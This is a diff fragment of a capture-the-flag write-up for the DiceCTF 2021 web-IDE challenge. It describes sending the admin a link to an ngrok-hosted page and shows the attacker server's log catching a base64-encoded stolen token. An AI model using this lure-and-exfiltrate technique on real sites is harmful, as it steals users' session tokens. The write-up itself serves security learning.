zoeyg/public-write-ups/dice-2021/web-IDE.md

 </script>
 ```

-We send a link to this file, which is hosted via ngrok on our local server.
-If everything does to plan, we should get a hit on our local server:
+We send the admin a link to this file, which is hosted via ngrok on our local server.
+If everything does to plan, we should get a hit on our local server, and on my [tools server](https://github.com/zoeyg/sec/blob/master/tools/simple-http-server.js) the `/b64/:contents` route decodes contents
+and logs it to stdout:

 ```
 22:09:14: GET /b64/dG9rZW49ZGljZXtjMHVsZG43X2YxbmRfNF9iNGNrcjBueW1fZjByXzFkZX0=